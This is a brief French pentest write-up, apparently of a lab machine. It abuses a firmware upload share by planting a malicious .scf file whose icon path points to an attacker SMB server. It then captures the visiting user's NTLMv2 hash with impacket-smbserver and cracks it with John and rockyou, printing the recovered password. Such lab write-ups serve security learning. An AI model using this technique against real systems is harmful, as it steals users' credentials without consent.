File Upload + Capture NTLMv2 (.scf File) - Pentesting Web

Le site propose une option de téléchargement de firmware. Le message indique :

Sélectionnez le modèle d'imprimante et téléchargez la mise à jour du firmware correspondante sur notre partage de fichiers. Notre équipe de test examinera les téléchargements manuellement et commencera les tests prochainement.

Exploitation - SCF Malicious File :

Création d'un fichier malveillant .scf pour capturer le NTLMv2 d’un utilisateur lorsqu’il l’ouvre :

[Shell]
Command=2
IconFile=\\10.10.14.7\smbFolder\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

Mise en écoute avec impacket pour capturer le NTLMv2 :

impacket-smbserver smbFolder $(pwd) -smb2support

Capture du hash NTLMv2 de l'utilisateur tony.

Craquage du hash NTLM avec John :

john --wordlist=/usr/share/wordlists/rockyou.txt hash

tony:liltony

Mis à jour il y a 1 an

hashtagExploitation - SCF Malicious File :

Exploitation - SCF Malicious File :